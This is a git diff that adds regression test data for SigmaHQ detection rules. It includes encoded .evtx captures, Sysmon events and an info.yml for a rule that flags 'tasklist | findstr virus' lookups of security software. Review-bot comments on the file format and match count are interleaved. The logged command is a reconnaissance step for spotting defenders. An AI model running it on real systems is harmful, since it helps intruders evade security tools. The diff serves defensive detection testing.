z`Cgtj{Eoshr*>{MQ@fTryE*-K?L&6uWJkA?Yvg|SPY6?;^i;-!cv_mzT&nr{IZ!W-qsU?HU=b(P-Bf&11DibJ8{eQRHO zGx9=P$;rM4^uAO%#9xp7(TAl^yc4wgWSX6rxmM;mareoE2Y#aSg7fDdUvQxPpIa_n z@pliMd=4B}fNjsj#1lAe^b6q)PfT2e&^O~8Z@&>G8;gV}_V}^m`fW(BS8T^@!2$ex z19)ej523LawhRp)zX`nnds2*HmfUV|qQZg(!>Vy7A^3hBo$?})zEkvO(CNc`3va+H zDi~*tP9N`VGjSGX#MvUl7YRSZGi`FeBpKcZew4oK4fqr%t8}RIlA(&Rqx=AJ$M=4E z1H~#_y$;7*YL3g1uTInr!;N9*jXqf}gOlY_qGDdIW5QN3F-x#ZM<+Pp3XD`|Jxz+_u~zUW~56!?bh~FiSOW?``zwD-Ma6TkUAqK8@p^5T53P?G$@XuUItNq$B;{o zp|i!t(RN2L*M=qBBky-0=iEQH10j+zs}P2Fdl7pK@rFpM za8`r=82+QENxm^5gl{uuDn;;Z!FeMN&h(Apx=GGpYR3Hr+++9%o_xJ87CSDdF?Qw&L@aVyrHPuzN^h`6-~Ux;z_ zIbkTe;g;ddJ2!C)<4#AG{6gi0=kd_x2kyS>=}qrHynW(p$fd@udvRJAxJBtt+;T-E zja)N8B#mW3O@a8Xai#)2g{$0>T0NSo 
zM{PV+;7kE>)^Nu5Y zmuc#o-I6+YtJn&Co+Fi%5>--K)XB4Y$OLM3HTbQ^9a62598kAYT4)2F@*X7%HAE$E zs0}hDUNdE7ODpT37k8#=(njk}&e)HjOhzQiQ3v0P@}aGvY~&8;Z0Y&wn6wqc2*q%m zZPp>~M0v!Z-No?@;yenzxQ}QI99MzoxIC(m(^~K!!aYjDI^>v7c#j$@_0Z2DwFq)T z3y3KngnhuC(*-|47pT#W*$x}=2(EU6S6V{72+LjNKZ9p?!W!6t@}O3{17&gpXi+xr z01ck)LhSAGtPcO=gr(jD9=3yndRX#|OI`ePsOuKwkhbdx`fnw2MNOa+_h+_JO|F=y z9H%^g9Ik^~v^>A&rF_csPA~P}ba`$ly2*3H*&LVW)5(GTRu0I%Q5bTd6+QDHjzh3b zH)EAi9Osladudb7dQXMyV*ix=)F(uz?x!c4Hsw+8>MWY-Uo{ln`l;b;j{8?lKTXAI z@(lBqz1_rPr<&De!2-lP3Jr7e_(%Bfb!t1d04zI9zb<&;P26Y2gmL(xr68P4XY zK4JW6Zax~ysG0a^*gD+C46Ki47+U@qbb4czB<*E07LYD`lyq_Sv(%uRH=vF}umPyS z=jLa@x?uJn_M;H=^KRXbYJR;rk9hw<5%InhUk_kReoh#QZvDt`c8<=w;U1-CJgybz zd_U$bUS+GZf6>)3wU(W&b4vO~geU$#vv@qQ9acH5^ZOSG(GQP^+qzDpl!*Fm#=5nulS*s+I2}uwSRX?;hE9Nh@`{(0v7cC)zl7TWOfw zlO}!qoZf)UcOh&APPN0z)#ES-5kp^5d$_DaN)1Rah{No1lbK?+CASVTuM7P3q9$h} zErqGIvyfIDa$5_&x@RFRdWf2kUUFBU%<`JP23WV%&?MUMWr;O_E0&sDiDlO=&U6PJ zYLaZX^mUBD_o2p~D=`kpxf=Ax?15K_Ivjl|{0vcEQf|_((WB*N%YWumZhpmKovfkg zCN~Xd1td2=vT_ssFSngX=DOVE{#mq5+@wJEGMJiYCsJ#kg|sNo>7}lpm9(rpKYKeM z<`4EB1k1rV18bv9{kwv6oRQ&eJ138gn9ULMk|vvLs-1%M#(8S@YF?t#e%*U93yYpEe)K=zr}Y0lrHNYr literal 0 HcmV?d00001 diff --git a/regression_data/windows/process_creation/proc_creation_win_findstr_security_keyword_lookup/4fe074b4-b833-4081-8f24-7dcfeca72b42.json b/regression_data/windows/process_creation/proc_creation_win_findstr_security_keyword_lookup/4fe074b4-b833-4081-8f24-7dcfeca72b42.json new file mode 100644 index 000000000..ce96c60fa --- /dev/null +++ b/regression_data/windows/process_creation/proc_creation_win_findstr_security_keyword_lookup/4fe074b4-b833-4081-8f24-7dcfeca72b42.json 
@@ -0,0 +1,198 @@ +{ + "Event": { + "#attributes": { + "xmlns": "http://schemas.microsoft.com/win/2004/08/events/event" + }, + "System": { + "Provider": { + "#attributes": { + "Name": "Microsoft-Windows-Sysmon", + "Guid": "5770385F-C22A-43E0-BF4C-06F5698FFBD9" + } + }, + "EventID": 1, + "Version": 5, + "Level": 4, + "Task": 1, + "Opcode": 0, + "Keywords": "0x8000000000000000", + "TimeCreated": { + "#attributes": { + "SystemTime": "2025-10-25T13:52:18.663980Z" + } + }, + "EventRecordID": 9145421, + "Correlation": null, + "Execution": { + "#attributes": { + "ProcessID": 3308, + "ThreadID": 4008 + } + }, + "Channel": "Microsoft-Windows-Sysmon/Operational", + "Computer": "ar-win-dc.attackrange.local", + "Security": { + "#attributes": { + "UserID": "S-1-5-18" + } + } + }, + "EventData": { + "RuleName": "-", + "UtcTime": "2025-10-25 13:52:18.657", + "ProcessGuid": "5AA13A44-D612-68FC-1931-000000004002", + "ProcessId": 5144, + "Image": "C:\\Windows\\System32\\cmd.exe", + "FileVersion": "10.0.20348.3932 (WinBuild.160101.0800)", + "Description": "Windows Command Processor", + "Product": "Microsoft® Windows® Operating System", + "Company": "Microsoft Corporation", + "OriginalFileName": "Cmd.Exe", + "CommandLine": "cmd /c \"tasklist | findstr virus\"", + "CurrentDirectory": "C:\\Users\\Administrator\\Downloads\\", + "User": "ATTACKRANGE\\Administrator", + "LogonGuid": "5AA13A44-568F-68FB-E39A-520000000000", + "LogonId": "0x529ae3", + "TerminalSessionId": 2, + "IntegrityLevel": "High", + "Hashes": "SHA1=BC2820B5EE7B43C172005B66546F12316DE8C081,MD5=8903A3381FBB033A45F5C2C50C175C54,SHA256=F7C237A49B96FD77C047910E13F24AAC4678A0F94BABDB06643DBA63F38D48E5,IMPHASH=D60B77062898DC6BFAE7FE11A0F8806C", + "ParentProcessGuid": "5AA13A44-0FEC-68FC-281E-000000004002", + "ParentProcessId": 6304, + "ParentImage": "C:\\Windows\\System32\\cmd.exe", + "ParentCommandLine": "\"C:\\Windows\\System32\\cmd.exe\"", + "ParentUser": "ATTACKRANGE\\Administrator" + } + } +} +{ + "Event": { + 
"#attributes": { + "xmlns": "http://schemas.microsoft.com/win/2004/08/events/event" + }, + "System": { + "Provider": { + "#attributes": { + "Name": "Microsoft-Windows-Sysmon", + "Guid": "5770385F-C22A-43E0-BF4C-06F5698FFBD9" + } + }, + "EventID": 1, + "Version": 5, + "Level": 4, + "Task": 1, + "Opcode": 0, + "Keywords": "0x8000000000000000", + "TimeCreated": { + "#attributes": { + "SystemTime": "2025-10-25T13:52:18.675229Z" + } + }, + "EventRecordID": 9145437, + "Correlation": null, + "Execution": { + "#attributes": { + "ProcessID": 3308, + "ThreadID": 4008 + } + }, + "Channel": "Microsoft-Windows-Sysmon/Operational", + "Computer": "ar-win-dc.attackrange.local", + "Security": { + "#attributes": { + "UserID": "S-1-5-18" + } + } + }, + "EventData": { + "RuleName": "-", + "UtcTime": "2025-10-25 13:52:18.674", + "ProcessGuid": "5AA13A44-D612-68FC-1A31-000000004002", + "ProcessId": 6320, + "Image": "C:\\Windows\\System32\\tasklist.exe", + "FileVersion": "10.0.20348.1 (WinBuild.160101.0800)", + "Description": "Lists the current running tasks", + "Product": "Microsoft® Windows® Operating System", + "Company": "Microsoft Corporation", + "OriginalFileName": "tasklist.exe", + "CommandLine": "tasklist", + "CurrentDirectory": "C:\\Users\\Administrator\\Downloads\\", + "User": "ATTACKRANGE\\Administrator", + "LogonGuid": "5AA13A44-568F-68FB-E39A-520000000000", + "LogonId": "0x529ae3", + "TerminalSessionId": 2, + "IntegrityLevel": "High", + "Hashes": "SHA1=A440302FCCCB6D181F8DB017265602397E1EB92A,MD5=2B05A9BDFAEAC5743B47A10F3F0A202B,SHA256=31E6A056EB1E722D8EC8C7E152E6A410B12D6055140BC38FFA1CCBD56AD4E623,IMPHASH=FCEA32ABE79C10DFACC88F5335DD89DE", + "ParentProcessGuid": "5AA13A44-D612-68FC-1931-000000004002", + "ParentProcessId": 5144, + "ParentImage": "C:\\Windows\\System32\\cmd.exe", + "ParentCommandLine": "cmd /c \"tasklist | findstr virus\"", + "ParentUser": "ATTACKRANGE\\Administrator" + } + } +} +{ + "Event": { + "#attributes": { + "xmlns": 
"http://schemas.microsoft.com/win/2004/08/events/event" + }, + "System": { + "Provider": { + "#attributes": { + "Name": "Microsoft-Windows-Sysmon", + "Guid": "5770385F-C22A-43E0-BF4C-06F5698FFBD9" + } + }, + "EventID": 1, + "Version": 5, + "Level": 4, + "Task": 1, + "Opcode": 0, + "Keywords": "0x8000000000000000", + "TimeCreated": { + "#attributes": { + "SystemTime": "2025-10-25T13:52:18.677359Z" + } + }, + "EventRecordID": 9145443, + "Correlation": null, + "Execution": { + "#attributes": { + "ProcessID": 3308, + "ThreadID": 4008 + } + }, + "Channel": "Microsoft-Windows-Sysmon/Operational", + "Computer": "ar-win-dc.attackrange.local", + "Security": { + "#attributes": { + "UserID": "S-1-5-18" + } + } + }, + "EventData": { + "RuleName": "-", + "UtcTime": "2025-10-25 13:52:18.676", + "ProcessGuid": "5AA13A44-D612-68FC-1B31-000000004002", + "ProcessId": 9052, + "Image": "C:\\Windows\\System32\\findstr.exe", + "FileVersion": "10.0.20348.1 (WinBuild.160101.0800)", + "Description": "Find String (QGREP) Utility", + "Product": "Microsoft® Windows® Operating System", + "Company": "Microsoft Corporation", + "OriginalFileName": "FINDSTR.EXE", + "CommandLine": "findstr virus", + "CurrentDirectory": "C:\\Users\\Administrator\\Downloads\\", + "User": "ATTACKRANGE\\Administrator", + "LogonGuid": "5AA13A44-568F-68FB-E39A-520000000000", + "LogonId": "0x529ae3", + "TerminalSessionId": 2, + "IntegrityLevel": "High", + "Hashes": "SHA1=7E484985CC835B3892F7445D2692227BA2D2E6F5,MD5=D0A20941751521C0D19BD3EABF34C446,SHA256=940CBEC6750076F2A191CBC8DA96AAE1905F7D9709B48C839BBD52884EFF1A45,IMPHASH=A27641A39DA5A6B0717E06BA00E56B7F", + "ParentProcessGuid": "5AA13A44-D612-68FC-1931-000000004002", + "ParentProcessId": 5144, + "ParentImage": "C:\\Windows\\System32\\cmd.exe", + "ParentCommandLine": "cmd /c \"tasklist | findstr virus\"", + "ParentUser": "ATTACKRANGE\\Administrator" + } + } +} 
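Review bot: this file is three top-level JSON objects concatenated back to back, each pretty-printed across many lines, which is neither a JSON array nor newline-delimited JSON; a standard parser such as Python's `json.load` rejects it with an extra-data error and a line-oriented NDJSON reader cannot split it either. Wrap the events in an array (`[ {...}, {...}, {...} ]`) or emit one compact object per line so tooling that reads the companion can parse it without a custom streaming parser.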
diff --git a/regression_data/windows/process_creation/proc_creation_win_findstr_security_keyword_lookup/info.yml b/regression_data/windows/process_creation/proc_creation_win_findstr_security_keyword_lookup/info.yml new file mode 100644 index 000000000..f71546cde --- /dev/null +++ b/regression_data/windows/process_creation/proc_creation_win_findstr_security_keyword_lookup/info.yml @@ -0,0 +1,13 @@ +id: 4497a849-5942-4e5f-9de7-9c82c41e4ad9 +description: N/A +date: 2025-10-24 +author: SigmaHQ Team +rule_metadata: + - id: 4fe074b4-b833-4081-8f24-7dcfeca72b42 + title: Security Tools Keyword Lookup Via Findstr.EXE +regression_tests_info: + - name: Positive Detection Test + type: evtx + provider: Microsoft-Windows-Sysmon + match_count: 1 + path: regression_data/windows/process_creation/proc_creation_win_findstr_security_keyword_lookup/4fe074b4-b833-4081-8f24-7dcfeca72b42.evtx 
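Review bot: `match_count: 1` deserves a second look, because the capture contains two process-creation events whose CommandLine includes `findstr virus`: the cmd.exe wrapper (ProcessId 5144, `cmd /c "tasklist | findstr virus"`) and findstr.exe itself (ProcessId 9052, `findstr virus`). A count of 1 is only right if the rule also constrains Image or OriginalFileName to findstr.exe; if the selection keys on CommandLine alone, the expected count is 2. Either way, state in the description which of the two events is the intended hit, and replace `description: N/A` with the command that was run.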
diff --git a/regression_data/windows/process_creation/proc_creation_win_finger_execution/af491bca-e752-4b44-9c86-df5680533dbc.evtx b/regression_data/windows/process_creation/proc_creation_win_finger_execution/af491bca-e752-4b44-9c86-df5680533dbc.evtx new file mode 100644 index 0000000000000000000000000000000000000000..3c9cdf2389f7fa689a2ee379c5124ca28fa3ea88 GIT binary patch literal 69632 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 